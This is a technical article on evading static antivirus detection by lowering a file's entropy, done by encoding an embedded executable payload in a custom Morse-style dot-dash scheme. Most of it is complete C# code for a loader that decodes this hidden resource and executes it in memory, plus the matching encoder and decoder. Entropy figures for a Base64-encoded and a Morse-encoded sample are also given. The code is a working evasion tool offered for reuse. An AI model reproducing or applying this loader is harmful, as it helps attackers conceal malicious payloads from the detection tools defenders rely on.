Introduction
This article demonstrates how to reduce a file's entropy score, with the goal of evading static detection, by encoding characters using only dots and dashes. The approach is inspired by Morse code!
Primary Keywords: Binary Entropy analysis | Evading Static Analysis | Morse Code Encoder
What is Morse Code?
Morse Code is a communications “language” that was initially developed for the letter-by-letter transmission of textual information by wire using the telegraph system. The code has also found wireless applications using signal lamps and audio devices, and has been used in long-range radio communications and radio navigation [1].
The Morse Code
Samuel Morse developed the initial facets of the code which bears his name, but others contributed to the code as it now exists. The International Morse Code encodes each letter of the basic Latin alphabet, each of the Arabic numerals, and a small set of punctuation and procedural signals (prosigns) as a sequence of short and long electrical pulses referred to as “dots” (short) and “dashes” (long), or “dits” and “dahs” [1]. The code is depicted in the following tables [2]:
Letters –
A | .- | N | -. |
B | -... | O | --- |
C | -.-. | P | .--. |
D | -.. | Q | --.- |
E | . | R | .-. |
F | ..-. | S | ... |
G | --. | T | - |
H | .... | U | ..- |
I | .. | V | ...- |
J | .--- | W | .-- |
K | -.- | X | -..- |
L | .-.. | Y | -.-- |
M | -- | Z | --.. |
Numbers –
1 | .---- | 6 | -.... |
2 | ..--- | 7 | --... |
3 | ...-- | 8 | ---.. |
4 | ....- | 9 | ----. |
5 | ..... | 0 | ----- |
Punctuation –
& Ampersand | .-... | ' Apostrophe | .----. |
@ At sign | .--.-. | ) Bracket, close (parenthesis) | -.--.- |
: Colon | ---... | ( Bracket, open (parenthesis) | -.--. |
, Comma | --..-- | = Equals sign | -...- |
! Exclamation mark | -.-.-- | . Full-stop (period) | .-.-.- |
- Hyphen | -....- | × Multiplication sign (also x) | -..- |
% Percentage (literally 0/0) | ----- -..-. ----- | + Plus sign | .-.-. |
" Quotation marks | .-..-. | ? Question mark (query) | ..--.. |
/ Slash | -..-. |
Entropy analysis
Entropy is a measure of randomness within a set of data. In the context of information theory and cybersecurity, the term usually refers to Shannon entropy. Computed over the bytes of a file, it yields a value between 0 and 8 (bits per byte), where values near 8 indicate that the data is very random, while values near 0 indicate that the data is very homogeneous [3].
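To make the 0 to 8 range concrete, here is a minimal sketch of a byte-level Shannon entropy calculation. The class and method names (EntropySketch, ShannonEntropy) are illustrative assumptions, and this is not necessarily how any particular tool computes its score.

```csharp
using System;
using System.Text;

public static class EntropySketch
{
    // Shannon entropy in bits per byte: H = -sum(p_i * log2(p_i)),
    // where p_i is the relative frequency of byte value i in the data.
    public static double ShannonEntropy(byte[] data)
    {
        if (data == null || data.Length == 0)
            return 0.0;

        // Count how often each of the 256 possible byte values occurs.
        var counts = new long[256];
        foreach (byte b in data)
            counts[b]++;

        double entropy = 0.0;
        foreach (long count in counts)
        {
            if (count == 0)
                continue; // absent values contribute nothing
            double p = (double)count / data.Length;
            entropy -= p * Math.Log(p, 2);
        }
        return entropy;
    }
}
```

A buffer of identical bytes scores 0, while a buffer in which all 256 byte values occur equally often scores 8 (up to floating-point rounding).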
How does Entropy analysis apply to intrusion detection?
Shannon entropy can be a good indicator for detecting the use of packing, compression, and encryption in a file. Each of the previously mentioned techniques tends to increase the overall entropy of a file. This makes sense intuitively. Let’s take compression for example. Compression algorithms reduce the size of certain types of data by replacing duplicated parts with references to a single instance of that part. The end result is a file with less duplicated contents. The less duplication there is in a file, the higher the entropy will be because the data is less predictable than it was before [3].
As it turns out, malware authors also tend to rely heavily on packing, compression, and encryption to obfuscate their tools in order to evade signature-based detection systems [3].
Reducing Entropy level using Morse Code
The primary goal here is to reduce the entropy level. The scenario described in this article is that we have a .NET PE that loads and executes an embedded PE that has been encoded using Base64 and Morse code.
The program loads Morse-encoded data from an embedded resource, then decodes it and executes it in memory:
- Read the content of the embedded file “mc”
- Decode the content from Morse code to Base64, then from Base64 to raw bytes
- Load the assembly bytes and invoke the entry point in memory
Morse Code sample snippet:
-~...-~..-..-~--.-~.-~.-~--~.-[...snip...]~.-~.-~-..-.~-..-.~---..~.-
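As a worked example, the first eight tokens of the sample above can be decoded by hand. The sketch below uses only the six token mappings those tokens need, copied from the encoder dictionary listed later in this article; the class name SnippetDecodeSketch is an illustrative assumption.

```csharp
using System;
using System.Collections.Generic;
using System.Text;

public static class SnippetDecodeSketch
{
    // Subset of the article's dictionary, reversed (token -> character).
    // Only the tokens that occur at the start of the sample are included.
    private static readonly Dictionary<string, char> Tokens = new Dictionary<string, char>
    {
        { "-", 'T' }, { "...-", 'V' }, { "..-..-", 'q' },
        { "--.-", 'Q' }, { ".-", 'A' }, { "--", 'M' },
    };

    // Splits on the '~' separator and maps each known token back to its character.
    public static string Decode(string morse)
    {
        var sb = new StringBuilder();
        foreach (string token in morse.Split('~'))
        {
            if (Tokens.TryGetValue(token, out char c))
                sb.Append(c);
        }
        return sb.ToString();
    }
}
```

Decoding "-~...-~..-..-~--.-~.-~.-~--~.-" yields the Base64 text "TVqQAAMA", and Convert.FromBase64String("TVqQAAMA") begins with the bytes 0x4D 0x5A ("MZ"), the magic number that opens a PE file.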
Calculating the Entropy Score
We can calculate the entropy score using the sigcheck.exe utility that comes with the Microsoft Sysinternals Suite:
> sigcheck.exe -h -a FILE_PATH
Here are the results for two PE samples: one whose embedded PE resource is encoded as Morse code, and one whose embedded PE resource is encoded as Base64 only. The Base64 sample has an entropy score of 5.781, while the Morse code sample scores 2.572.
Our Entropy analysis aligns with the results described in Figure 2!
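One way to see why the dot-and-dash encoding scores lower is the general upper bound on Shannon entropy for data drawn from k distinct symbols. The comparison below is a sketch under two assumptions: each character is stored as one byte, and only the encoded payload is considered.

```latex
H = -\sum_{i=1}^{k} p_i \log_2 p_i \;\le\; \log_2 k,
\qquad
\log_2 3 \approx 1.585 \ \text{(dot, dash, separator)},
\qquad
\log_2 64 = 6 \ \text{(Base64 alphabet, ignoring padding)}.
```

The scores reported above are measured over the whole PE file, which also contains code and metadata, so they are not expected to match these per-payload bounds exactly.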
The Morse Code Encoder
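The following is the complete code for our test program, including the encoding and decoding functions. It is a simple demonstration of how to encode characters using dots and dashes. Note that the dictionary departs from standard Morse code in places, for example by adding six-symbol codes for lowercase letters. You might think of your own encoding dictionary!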
using System;
using System.Collections.Concurrent;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Reflection;
using System.Text;
using System.Threading;
using System.Threading.Tasks;

namespace ConsoleApp2
{
    internal class Program
    {
        private static void Main()
        {
            // Morse-encoded payload stored as the embedded resource "mc"
            string res = Properties.Resources.mc;
            // Debug
            File.WriteAllText("mc.txt", res);
            // Morse code -> Base64 -> raw assembly bytes
            var b64 = MorseEncoder.Decode(res).Result;
            var pBytes = Convert.FromBase64String(b64);
            // Debug
            File.WriteAllBytes("prog.exe", pBytes);
            if (pBytes.Length < 10)
                return;
            var thread = new Thread(() =>
            {
                var assembly = Assembly.Load(pBytes);
                MethodInfo method = assembly.EntryPoint;
                if (method != null)
                {
                    // Main may or may not declare a string[] parameter
                    object[] args = method.GetParameters().Length == 0
                        ? null
                        : new object[] { new string[0] };
                    method.Invoke(null, args);
                }
            });
            thread.SetApartmentState(ApartmentState.STA);
            thread.Start();
        }
    }
    internal static class MorseEncoder
    {
        private static readonly Dictionary<char, string> MorseCodeDict = new Dictionary<char, string>
        {
            {'A', ".-"},
            {'B', "-..."},
            {'C', "-.-."},
            {'D', "-.."},
            {'E', "."},
            {'F', "..-."},
            {'G', "--."},
            {'H', "...."},
            {'I', ".."},
            {'J', ".---"},
            {'K', "-.-"},
            {'L', ".-.."},
            {'M', "--"},
            {'N', "-."},
            {'O', "---"},
            {'P', ".--."},
            {'Q', "--.-"},
            {'R', ".-."},
            {'S', "..."},
            {'T', "-"},
            {'U', "..-"},
            {'V', "...-"},
            {'W', ".--"},
            {'X', "-..-"},
            {'Y', "-.--"},
            {'Z', "--.."},
            {'a', "-..---"},
            {'b', "----.-"},
            {'c', "-.----"},
            {'d', "-----."},
            {'e', ".----."},
            {'f', "--.---"},
            {'g', ".-..--"},
            {'h', "..-.--"},
            {'i', "-..--."},
            {'j', "--.-.."},
            {'k', "-.-..-"},
            {'l', "..-.-."},
            {'m', "-...--"},
            {'n', "-....."},
            {'o', "..----"},
            {'p', "-.---."},
            {'q', "..-..-"},
            {'r', ".--..-"},
            {'s', ".-...-"},
            {'t', "-..-.."},
            {'u', "----.."},
            {'v', ".-...."},
            {'w', ".-.--."},
            {'x', ".-.-.."},
            {'y', "---.-."},
            {'z', "...---"},
            {'0', "-----"},
            {'1', ".----"},
            {'2', "..---"},
            {'3', "...--"},
            {'4', "....-"},
            {'5', "....."},
            {'6', "-...."},
            {'7', "--..."},
            {'8', "---.."},
            {'9', "----."},
            {',', "--..--"},
            {'?', "..--.."},
            {'\'', "..---."},
            {'!', "-.-.--"},
            {'/', "-..-."},
            {'(', "-.--."},
            {')', "-.--.-"},
            {'&', ".-..."},
            {':', "---..."},
            {';', "-.-.-."},
            {'=', "-...-"},
            {'-', "-....-"},
            {'_', "..--.-"},
            {'"', ".-..-."},
            {'$', "...-..-"},
            {'@', ".--.-."},
            {'.', ".-.-.-"},
            {'+', "...-.-"},
            {'[', "..-..."},
            {']', "---..-"},
            {'%', ".-.---"},
            {' ', "/"},
        };
        private static async Task<string> ReadFileAsStringAsync(string path)
        {
            using (StreamReader reader = new StreamReader(path, Encoding.UTF8))
            {
                return await reader.ReadToEndAsync();
            }
        }

        public static async Task<string> EncodeFile(string filePath, bool doBase64PreEncoding)
        {
            string morseCode;
            if (doBase64PreEncoding)
            {
                var base64 = await EncodeFileToStringAsync(filePath);
                morseCode = await Encode(base64);
            }
            else
            {
                var input = await ReadFileAsStringAsync(filePath);
                morseCode = await Encode(input);
            }
            return morseCode;
        }
        public static async Task<string> Encode(string message)
        {
            var sb = new StringBuilder();
            // Divide the input into smaller chunks and process them in parallel
            var chunkSize = 1000;
            var numChunks = (message.Length + chunkSize - 1) / chunkSize;
            await Task.Run(() =>
            {
                var results = new ConcurrentDictionary<int, string>();
                Parallel.For(0, numChunks, chunkIndex =>
                {
                    var chunkStringBuilder = new StringBuilder();
                    var start = chunkIndex * chunkSize;
                    var end = Math.Min(message.Length, start + chunkSize);
                    for (var i = start; i < end; i++)
                    {
                        // Characters missing from the dictionary are skipped.
                        // A space needs no special case: it maps to "/" in MorseCodeDict.
                        if (MorseCodeDict.TryGetValue(message[i], out string morse))
                        {
                            chunkStringBuilder.Append(morse);
                            chunkStringBuilder.Append('~');
                        }
                    }
                    results.TryAdd(chunkIndex, chunkStringBuilder.ToString());
                });
                // Combine the results back into a single string, in chunk order
                foreach (var kvp in results.OrderBy(pair => pair.Key))
                {
                    sb.Append(kvp.Value);
                }
            });
            // Every token is followed by '~', so drop the trailing separator
            return sb.ToString().TrimEnd('~');
        }
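        // Reverse lookup table (Morse token -> character), built once so that
        // decoding does not scan MorseCodeDict for every token.
        private static readonly Dictionary<string, char> ReverseMorseCodeDict =
            MorseCodeDict.ToDictionary(pair => pair.Value, pair => pair.Key);

        public static async Task<string> Decode(string morseCode)
        {
            return await Task.Run(() =>
            {
                var decodedMessage = new StringBuilder();
                var morseWords = morseCode.Split(new[] { " / " }, StringSplitOptions.None);
                foreach (var morseWord in morseWords)
                {
                    // Tokens within a word are separated by '~'
                    var morseChars = morseWord.Split('~');
                    foreach (var morseChar in morseChars)
                    {
                        // Unknown tokens are ignored
                        if (ReverseMorseCodeDict.TryGetValue(morseChar, out char character))
                        {
                            decodedMessage.Append(character);
                        }
                    }
                    decodedMessage.Append(' ');
                }
                return decodedMessage.ToString().TrimEnd();
            });
        }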
        public static byte[] DecodeToBytes(string base64String)
        {
            return Convert.FromBase64String(base64String);
        }

        public static async Task<string> EncodeFileToStringAsync(string filePath)
        {
            byte[] fileBytes = await ReadFileAsync(filePath);
            return Convert.ToBase64String(fileBytes);
        }

        private static async Task<byte[]> ReadFileAsync(string path)
        {
            using (FileStream fs = new FileStream(path, FileMode.Open, FileAccess.Read))
            {
                byte[] buffer = new byte[fs.Length];
                int offset = 0;
                // ReadAsync may return fewer bytes than requested, so loop until the buffer is full
                while (offset < buffer.Length)
                {
                    int read = await fs.ReadAsync(buffer, offset, buffer.Length - offset);
                    if (read == 0)
                        break; // unexpected end of file
                    offset += read;
                }
                return buffer;
            }
        }
    }
}
Summary
- The entropy score is one of the factors that malware analysts and AV/EDR products use to identify malware and packed or encrypted samples.
- A higher entropy score indicates a greater likelihood that the sample is packed, encrypted, or obfuscated.
- This article compared the entropy scores of two PE samples: the sample with the Base64-encoded payload scored 5.781, and the sample with the Morse-encoded payload scored 2.572.
- Malware authors tend to rely heavily on packing, compression, and encryption to obfuscate their tools in order to evade signature-based detection systems.
Interesting reads
Threat Actors Used Morse Code to Avoid Detection: Microsoft researchers revealed that threat actors turned to Morse code in a year-long phishing campaign.
References
[1] Morse Code
[3] Threat Hunting with File Entropy
[4] Using Entropy Analysis to Find Encrypted and Packed Malware